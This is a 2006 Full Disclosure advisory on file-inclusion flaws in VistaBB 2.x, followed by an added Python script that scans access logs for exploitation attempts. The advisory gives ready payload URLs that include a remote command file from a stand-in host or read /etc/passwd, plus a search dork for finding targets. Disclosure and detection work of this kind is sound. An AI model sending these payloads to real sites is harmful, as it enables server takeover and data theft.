Full Disclosure mailing list archives
Advisory: VistaBB <= 2.x Multiple File Inclusion Vulnerabilities
From: "Mustafa Can Bjorn IPEKCI" <nukedx () nukedx com>
Date: Thu, 24 Aug 2006 06:04:26 +0300
--Security Report--
Advisory: VistaBB <= 2.x Multiple File Inclusion Vulnerabilities
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 24/08/06 03:00 AM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx () nukedx com
Web: http://www.nukedx.com
}
---
Vendor: VistaBB (http://www.vistabb.net)
Version: 2.033 and prior versions must be affected.
About: Via these methods a remote attacker can include arbitrary files in VistaBB. The variable phpbb_root_path is not sanitized properly before it is used in includes/functions_mod_user.php and includes/functions_portal.php, so a remote attacker can include internal and external files in VistaBB. For including internal files, magic_quotes_gpc must be off in the server settings, because the remote attacker needs to use a null char at the end of the filename. Eg: /etc/passwd%00
Level: Highly Critical
---
How&Example:
GET -> http://[site]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=[FILE]
EXAMPLE -> http://[site]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=http://yoursite.com/cmd.txt?
EXAMPLE -> http://[site]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=/etc/passwd%00 <- mq off
GET -> http://[site]/[vistabbpath]/includes/functions_portal.php?phpbb_root_path=[FILE]
EXAMPLE -> http://[site]/[vistabbpath]/includes/functions_portal.php?phpbb_root_path=http://yoursite.com/cmd.txt?
EXAMPLE -> http://[site]/[vistabbpath]/includes/functions_portal.php?phpbb_root_path=/etc/passwd%00 <- mq off
---
Timeline:
* 24/08/2006: Vulnerability found.
* 24/08/2006: Contacted vendor, waiting for reply.
---
Exploit: http://www.nukedx.com/?getxpl=48
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=48
---
Dorks: "Powered by VistaBB"

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
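
Added example (not part of the original advisory, and not VistaBB or nukedx code): a defensive log check that flags requests matching the pattern the advisory describes, a phpbb_root_path parameter sent directly to the two include scripts. The combined access-log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts the advisory names as using phpbb_root_path without sanitizing it.
AFFECTED = ("includes/functions_mod_user.php", "includes/functions_portal.php")
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)

def classify(value):
    """Return the reasons a decoded phpbb_root_path value is suspicious."""
    reasons = []
    if REMOTE_RE.match(value):
        reasons.append("remote-url")      # external file inclusion
    if "\x00" in value:
        reasons.append("null-byte")       # %00 used to cut off the appended suffix
    if value.startswith("/") or "../" in value:
        reasons.append("local-path")      # internal file inclusion
    return reasons

def scan(lines):
    """Yield (line_no, script, reasons) for requests matching the advisory."""
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        script = next((s for s in AFFECTED if url.path.lower().endswith(s)), None)
        if script is None:
            continue
        # parse_qsl percent-decodes values, so %00 arrives here as "\x00".
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == "phpbb_root_path":
                # These files are include libraries; any client-supplied
                # value for this variable deserves a look.
                yield no, script, classify(value) or ["parameter-supplied"]

# Constructed sample log lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Aug/2006:06:10:00 +0300] "GET /forum/index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [24/Aug/2006:06:11:02 +0300] "GET /forum/includes/functions_mod_user.php?phpbb_root_path=http://example.invalid/x.txt? HTTP/1.1" 200 312',
    '192.0.2.44 - - [24/Aug/2006:06:11:09 +0300] "GET /forum/includes/functions_portal.php?phpbb_root_path=/etc/passwd%00 HTTP/1.1" 200 0',
    '192.0.2.7 - - [24/Aug/2006:06:12:30 +0300] "GET /forum/viewtopic.php?t=5 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```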